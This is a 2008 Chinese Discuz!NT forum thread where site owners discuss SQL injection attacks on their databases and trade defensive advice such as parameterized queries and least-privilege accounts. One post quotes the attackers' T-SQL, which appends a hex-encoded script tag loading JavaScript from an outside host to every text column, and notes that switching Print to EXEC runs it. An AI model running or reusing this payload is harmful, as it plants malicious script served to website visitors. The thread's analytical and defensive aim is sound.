Discuz!NT 2.5 beta下载测试
类库文档在线查看		 Comsenz 招聘信息
首届Discuz!NT 模板大赛圆满结束		 著名音乐网站SoGua网、分贝网
采用Discuz!NT搭建社区		 FIFA Online2官网论坛使用Discuz!NT
游戏城寨论坛使用Discuz!NT搭建
要灌, 就灌有技术含量的水
一起交流学习ASP.net吧!		 17套Discuz!NT界面模板提供下载
Discuz!NT后台截图先睹为快		 Discuz!NT文档中心
用户整合说明文档		 Discuz!NT亮相微软Tech-Ed 2007
Discuz!NT情景搞笑短片抢先看
3/3页123 跳转到查看:3841
发新话题 回复该主题

数据库遭到攻击 求救雪人以及各路高手!

离线 netnice
头像

  • 组别:新手上路
  • 性别:
  • 积分:25
  • 帖子:12
2008-05-11 14:29 树型| 收藏| 21#

回复:数据库遭到攻击 求救雪人以及各路高手!

我被注入攻击了两次!  查看了源码,怀疑是对注入字符没有检测和过虑
 

TOP

 
离线 flower_fox
头像

  • 组别:新手上路
  • 性别:
  • 积分:37
  • 帖子:24
2008-05-11 20:37 | 只看楼主 树型| 收藏| 22#

回复:数据库遭到攻击 求救雪人以及各路高手!

在此公布一下初步解决方案:

首先您自己编写的网站存在SQL注入攻击漏洞!
请将您的SQL代码编写成参数带入的形式 例如:
SqlCommand cmd = new SqlCommand("insert into TABLE1(A,B,C,D,E,F,G) values(@A,@B,@C,0,'" + DateTime.Now + "',null,null)", con);
                SqlParameter para = new SqlParameter("@A", SqlDbType.VarChar, 32);
                para.Value = ca.A;
                cmd.Parameters.Add(para);
                para = new SqlParameter("@B", SqlDbType.VarChar, 32);
                para.Value = ca.B;
                cmd.Parameters.Add(para);
                para = new SqlParameter("@C", SqlDbType.Int, 32);
                para.Value = Convert.ToInt32(ca.C);
                cmd.Parameters.Add(para);

页面接收的参数 全部用这个形式拼接SQL,不然会导致SQL注入攻击!

我已经翻译了这类攻击的几个代码行,发现攻击者还是比较人道
没有删除大家的数据,这类攻击可以删除SQL2000对应数据库上的数据!
这次对方只是修改了!
在此不便公布攻击代码~~~希望大家赶紧补自己写的程序漏洞!

给QQ我短信的朋友 我就不回复了 呵呵

再则是否DISCUZ论坛模板 也存在这种漏洞
我暂未测试  明天有空我会测试一下!

两天内公布测试情况  不过我估计DISCUZ模板这样的低级错误的可能性不大
主要还是各位写的代码部分的漏洞!
 

TOP

 
离线 TSXMLOVE
头像

  • 组别:新手上路
  • 性别:
  • 积分:15
  • 帖子:3
2008-05-12 09:36 树型| 收藏| 23#

回复:数据库遭到攻击 求救雪人以及各路高手!

DECLARE @T VARCHAR(255),@C VARCHAR(255)
    DECLARE TABLE_CURSOR CURSOR FOR
    SELECT A.NAME,B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.XTYPE='U' AND (B.XTYPE=99 OR B.XTYPE=35 OR B.XTYPE=231 OR B.XTYPE=167)
    OPEN TABLE_CURSOR
    FETCH NEXT FROM TABLE_CURSOR
    INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
    Print 'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR,['+@C+']))+CAST(0X3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2D AS VARCHAR(67))'
    FETCH NEXT FROM TABLE_CURSOR
    INTO @T,@C
    END
    CLOSE TABLE_CURSOR
    DEALLOCATE TABLE_CURSOR;--
    --EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR,['+@C+']))+CAST(0X3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2D AS VARCHAR(67))')
    --Print 'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR,['+@C+']))+CAST(0X3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2D AS VARCHAR(67))'
   
大家好!
以上是偶对SQL注入分析得到的一段代码
可以在查询分析器运行一下
如果将print 改为exec
数据库就会被更新了耶

我哋公司都係出再哩個问题
喺我查看咗IIS日志后
入侵者係通过SQL注入方式而得逞嘅
解决办法最好是将所有的请求参数进行过滤
用最低权限的SQL帐户运行ASP程序
将有安全隐患的扩展存储过程禁用掉
我就是这样做的
暂时没什么大问题
健身健美——健康美丽一生!
深圳市麒麟健身会有限公司
联系地址:深圳南山区玉泉路麒麟健身会
会所顾问:何先生13798572387
 

TOP

 
离线 flower_fox
头像

  • 组别:新手上路
  • 性别:
  • 积分:37
  • 帖子:24
2008-05-12 22:12 | 只看楼主 树型| 收藏| 24#

回复:数据库遭到攻击 求救雪人以及各路高手!

楼上是玉泉路呀 我也在玉泉路哦 好巧啊!
 

TOP

 
离线 perdu
头像

  • 组别:初级会员
  • 性别:
  • 积分:100
  • 帖子:43
2008-05-13 09:34 树型| 收藏| 25#

回复:数据库遭到攻击 求救雪人以及各路高手!

关注
 

TOP

 
离线 flower_fox
头像

  • 组别:新手上路
  • 性别:
  • 积分:37
  • 帖子:24
2008-05-13 18:43 | 只看楼主 树型| 收藏| 26#

回复:数据库遭到攻击 求救雪人以及各路高手!

各位如有发现DISCUZ!NT1.1 BBS模板有哪个页面有漏洞的 请告知!
我不想再被攻击了!
目前暂未发现漏洞~~~估计都是大家自己建的站点的SQL漏洞!
 

TOP

 
离线 yzy8788
头像

  • 组别:初级会员
  • 性别:
  • 积分:89
  • 帖子:33
2008-05-27 15:08 树型| 收藏| 27#

回复:数据库遭到攻击 求救雪人以及各路高手!

楼上们的,你们的这个问题都解决了吗?
我的怎么还是不行啊?我自己些的程序我过滤了,注入不了了,可是我网站上面的nt论坛就遭殃了,一个被搞n次,我改过来他改过去的,有解决的能教一下怎么解决吗?
QQ:517449116
 

TOP

 
<<上一主题|下一主题>>
3/3页123 跳转到
发表新主题 回复该主题